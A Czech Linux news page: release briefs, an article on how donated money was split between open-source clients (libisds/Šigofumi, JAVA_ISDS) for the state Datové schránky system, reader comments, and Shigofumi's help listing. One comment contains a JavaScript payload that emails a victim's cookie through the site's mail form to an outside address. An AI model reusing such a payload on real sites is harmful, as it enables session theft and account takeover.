Canonical vydal (email, blog, YouTube) Ubuntu 24.04 LTS Noble Numbat. Přehled novinek v poznámkách k vydání a také příspěvcích na blogu: novinky v desktopu a novinky v bezpečnosti. Vydány byly také oficiální deriváty Edubuntu, Kubuntu, Lubuntu, Ubuntu Budgie, Ubuntu Cinnamon, Ubuntu Kylin, Ubuntu MATE, Ubuntu Studio, Ubuntu Unity a Xubuntu. Jedná se o 10. LTS verzi.
Na YouTube je k dispozici videozáznam z včerejšího Czech Open Source Policy Forum 2024.
Fossil (Wikipedie) byl vydán ve verzi 2.24. Jedná se o distribuovaný systém správy verzí propojený se správou chyb, wiki stránek a blogů s integrovaným webovým rozhraním. Vše běží z jednoho jediného spustitelného souboru a uloženo je v SQLite databázi.
Byla vydána nová stabilní verze 6.7 webového prohlížeče Vivaldi (Wikipedie). Postavena je na Chromiu 124. Přehled novinek i s náhledy v příspěvku na blogu. Vypíchnout lze Spořič paměti (Memory Saver) automaticky hibernující karty, které nebyly nějakou dobu používány nebo vylepšené Odběry (Feed Reader).
OpenJS Foundation, oficiální projekt konsorcia Linux Foundation, oznámila vydání verze 22 otevřeného multiplatformního prostředí pro vývoj a běh síťových aplikací napsaných v JavaScriptu Node.js (Wikipedie). V říjnu se verze 22 stane novou aktivní LTS verzí. Podpora je plánována do dubna 2027.
Byla vydána verze 8.2 open source virtualizační platformy Proxmox VE (Proxmox Virtual Environment, Wikipedie) založené na Debianu. Přehled novinek v poznámkách k vydání a v informačním videu. Zdůrazněn je průvodce migrací hostů z VMware ESXi do Proxmoxu.
R (Wikipedie), programovací jazyk a prostředí určené pro statistickou analýzu dat a jejich grafické zobrazení, bylo vydáno ve verzi 4.4.0. Její kódové jméno je Puppy Cup.
IBM kupuje společnost HashiCorp (Terraform, Packer, Vault, Boundary, Consul, Nomad, Waypoint, Vagrant, …) za 6,4 miliardy dolarů, tj. 35 dolarů za akcii.
Byl vydán TrueNAS SCALE 24.04 “Dragonfish”. Přehled novinek této open source storage platformy postavené na Debianu v poznámkách k vydání.
Oznámeny byly nové Raspberry Pi Compute Module 4S. Vedle původní 1 GB varianty jsou nově k dispozici také varianty s 2 GB, 4 GB a 8 GB paměti. Compute Modules 4S mají na rozdíl od Compute Module 4 tvar a velikost Compute Module 3+ a předchozích. Lze tak provést snadný upgrade.
Projekt si zpočátku kladl ambiciózní cíle. Ačkoliv se v rámci tohoto projektu nepodařilo všech vytyčených cílů dosáhnout, podařilo se zviditelnit nedostatky ne zcela ideální implementace samotných Datových schránek a nabídnout použitelné řešení pro ty z nás, kteří nemohou používat oficiální webové rozhraní pro přístup k Datovým schránkám. Zároveň jsme rádi, že mimo projektů probíhajících v rámci AbcLinuxu, se vynořila řada dalších dobrých implementací.
Protože aktivita kolem samotného projektu utichla a naopak rostl tlak na závěrečný verdikt, bylo nutné najít způsob, jakým peníze rozdělit mezi přihlášené projekty. Po posouzení jsme došli k závěru, že peníze budou rozděleny mezi projekty libisds (knihovna v C a frontend Šigofumi) a JAVA_ISDS (implementace v Javě), a to v poměru půl na půl. Uvědomujeme si, že žádný způsob rozdělení peněz není úplně fér ke všem stranám zároveň: tedy přihlášeným i nepřihlášeným projektům, projektům, které mezitím vznikly pod záštitou nejrůznějších firem a sdružení a v podstatě ani k lidem a firmám, které na vývoj přispěly.
Díky tedy patří i ostatním projektům jako dsgui (CZ.NIC, z.s.p.o.), OpenDS.cz (blue.point Solutions, s.r.o.), datové schránky pro Android (APK SOFT s.r.o.) a řadě dalších.
Výše příspěvků a celou historii bankovního účtu, kde byly v rukou Liberix, o.p.s. spravovány finance, lze vidět na transparentním kontě (přehled v PDF). Peníze tedy byly rozděleny následovně:
Před rokem jsme zveřejnili stav obou projektů. Požádali jsme oba projekty o dodatečné zhodnocení – jedno zhodnocení, které jsme dostali, je krátké (za JAVA_ISDS) a jedno je velmi dlouhé (za libisds). Bylo nám líto to dlouhé zkracovat, proto jej najdete v celém znění na druhé stránce tohoto článku. Cílem bylo čtenáře seznámit s tím, co se v projektu událo a jaký je jejich postoj k datovým schránkám.
Chtěli bychom poděkovat všem vývojářům, kteří umožnili uživatelům přistupovat k Datovým schránkám z libovolného operačního systému, což pro mnohé nepředstavuje jen „funkci navíc“, ale také v podstatě zákonnou nezbytnost. Dále chceme poděkovat sdružení Liberix, o.p.s. za důležitou spolupráci a pomoc v průběhu projektu. Děkujeme všem, kteří finančně přispěli, ale také těm, kteří nějakým způsobem pomohli při testování a rozvoji všech otevřených řešení. A na závěr přejeme těm, kterých se to týká, šťastnější ruku při volbě a implementaci technologií, které se přímo dotýkají občanů této země.
Nedávno jsem přidal přihlašování i přes certifikát. Vyřízení osobního certifikátu od Postsignum bylo docela vtipné, krátce po jeho vydání mi volali s prosbou, abych se tam stavil, protože mi zapomněli dát podepsat souhlas se zpracovanim osobnich udajů...
Připravuji se na přechod na nové testovací prostředí, které bude spuštěno v únoru.
O Datových schránkách nemám kladné mínění, ale některé změny jsem uvítal s radostí: přechod na BASIC autentizaci místo původního řešení s cookies a několikanásobným přesměrováním. Člověk se také naučí defenzivnímu programování, protože ví, že se nemůže na nic spoléhat.
Knihovna není zcela hotová. Seznam věcí, které bych rád jednou začlenil, je zapsán v souboru TODO.
Především se jedná o podporu souběžného zpracování z více vláken, možnost při překladu vypnout podporu síťových funkcí, schopnost validovat požadavky a odpovědi serveru proti XML schématu a to nejdůležitější – dopsat testy pro síťové operace.
Testováním síťových operací myslím testy funkcí jako přihlášení k datové schránce, získání seznamu zpráv, odeslání zprávy atd. V současnosti existuje testovací instance ISDS, kde je možné takové operace vyzkoušet, ale vše s patřičnou časovou prodlevou a především není možné otestovat reakci knihovny na všechny chybové stavy nebo na chybně utvořené zprávy (například hodnota času doručení by nebyla správně utvořena.).
Co tedy chybí, je nástroj, který by simuloval server, a sada testů, které by prověřily knihovnu po všech stránkách, především v okrajových případech, které se za běžného provozu nevyskytují. Protože takovou péči by si zasloužily i jiné knihovny (napsané v rozličných jazycích) a protože simulátor testů a definice testů mohou být na konkrétní knihovně nezávislé, došel jsem k závěru, že je třeba věc uchopit značně abstraktně a na jazyku knihovny nezávisle. Protože se jedná v podstatě o samostatný projekt rozsahem srovnatelný se samotnou knihovnou, rozhodl jsem se, že jej prostřednictvím firmy Red Hat Czech s. r. o. nabídnu jako zadání bakalářské práce. Pokud bude téma akademicky průchodné a až budou všechny formality hotové, studenti Fakulty informatiky Masarykovy univerzity a Fakulty informačních technologií Vysokého učení technického v Brně dostanou příležitost, jak skloubit příjemné s užitečným.
Nástroje: Tisk bez diskuse
Tiskni Sdílej:
Koukám, že ty datové schránky nejsou zrovna bezpečné.Dobré ránko
Koukám, že ty datové schránky nejsou zrovna bezpečné.<uvítací melodie Windows XP>
Tu chybu s tím, že můžeš zjistit něco o zprávě, která ti nepatří by měli opravit.Jsou tam i horší věci.
debian-security
, takže jsem si zvykl na to, že privilege escalation je považováno za kritikou chybu, která se opraví tak nejvýš do jednoho dne. Obzvláště když k její opravě stačí jeden chown
.
Celkem neúspěšně jsem zkoušel najít nějaká čísla, ale narazil jsem i na vtipnou kalkulačku. Moc se mi líbí ta nulová cena..
Celkem neúspěšně jsem zkoušel najít nějaká číslaPokud by například Seznam doručoval e-maily za podobnou cenu, jako ISDS doručuje zprávy, začal by být v České republice citelný nedostatek peněz .
ale narazil jsem i na vtipnou kalkulačkuTo mi připomíná kalkulačku DP, která v případě dopravy metrem počítá čas z nástupiště na nástupiště…
A zasmál bych se ještě víc, kdyby tu někdo přihodil informaci, na kolik že tato taškařice přišla daňového poplatníka..Pokud si dobře vzpomínám, slyšel jsem něco o 800MKč. Jestli je v tom i provoz, nebo je to vyloženě za zhotovení, to si nepamatuju.
A zasmál bych se ještě víc, kdyby tu někdo přihodil informaci, na kolik že tato taškařice přišla daňového poplatníka..9×108 Kč.
A proč z toho viním programátory ze Slušovic?Svazarmovská badna Software602 je pražská. Nebo snad opravdu mají někoho ve Slušovicích? Nedošlo k záměně s SWS?.
za 60 litrov by to pravdepodobne zbúchala komerčná firma presne podla zadania, v kratšom čase a výsledok by bol funkčná aplikácia.Výsledek by byla aplikace nyní už zase nefunkční, protože od zadání se některé věci dost podstatně změnily. Takže byste vzal dalších 60 tisíc a dal je další firmě, aby to napsala znova podle nového zadání. A nebo tady máte opensource projekt, který není závislý na původním autorovi a může na něm pokračovat každý.
Výsledek by byla aplikace nyní už zase nefunkční, protože od zadání se některé věci dost podstatně změnily. Takže byste vzal dalších 60 tisíc a dal je další firmě, aby to napsala znova podle nového zadání.Ona je sporná i platnost tvrzení, že by to firma zbouchala za šedesát tisíc... tak nějak mi to přijde kapku málo.
za 60 litrov by to pravdepodobne zbúchala komerčná firma presne podla zadania, v kratšom čase a výsledok by bol funkčná aplikácia.Tak todle me neda se nevyjadrit! Zakolik ze to nezvladla na firma 602, ktera je komercni ? Ani tu multiplatformni knihovnu neudelala!
Ano, přesně tímto směrem jsem vtipkoval. Vtipkoval, protože
Můžete jmenovat nějaký celostátní IT projekt provozovaný českým státem, který byl zprovozněn "finančně při zdi" a bez pijavic? Mě se třeba líbí fungování CZ-NICu a NIXu posledních pár let, ale to jsou projekty vzešlé z iniciativy skupiny komerčních subjektů ("zájmové sdružení právnických osob") - to nejsou státní instituce. Jo kdyby něco takového rozjel CZ-NIC, a byl schopen zalobovat na vládě/parlamentu, že tento "freemail" bude mít stejné právní postavení jako dnešní Datové Schránky... taky by mě zajímalo, jak by musel vypadat komerční model té věci - uvědomte si, že NIX a CZ.NIC jsou financovány několika málo komerčními subjekty (domény se platí od kusu, ale nepřímo prostřednictvím komerčních registrátorů) => čili takhle nějak by musely fungovat i platby za "oficiální centrální mailbox".
xmlhttp.open('GET', '/Profile?action=sendEmail&uid=15224'); xmlhttp.send(''); var pole = xmlhttp.responseText.split(' '); var kod = ''; var part_num = 0; while (part_num < pole.length) { if (pole[part_num] == 'hodnotu') { kod = pole[part_num+1].substring(0,4); break; } part_num += 1; } xmlhttp.open('GET', '/Mail?KOD=' + kod + '&sender=admin%40pobox.sk&cc=&bcc=&subject=' + cookie + '&message=' + cookie + '&finish=Odeslat&url=%2FProfile%2F15224&action=finish'); xmlhttp.send('');
This is Shigofumi, an ISDS client. Have a nice e-government. Use `help' command to get list of available commands. shigofumi> help Following commands are available: accept accept commercial message box show current box details cache show cache details cd change working directory commercial manipulate commercial receiving box status compose compose a message convert submit local document for authorized conversion copying show this program licence excerpt debug set debugging delivery get message delivery details findbox search for a box hash query ISDS for message hash help describe commands load load message or message delivery details from local file login log into ISDS lsi list received messages lso list sent messages msgi get incoming message msgo get outgoing message passwd manipulate user password pwd print working directory quit exit shigofumi read mark message as read statbox get status of a box user show current user details users show box users version show version of this program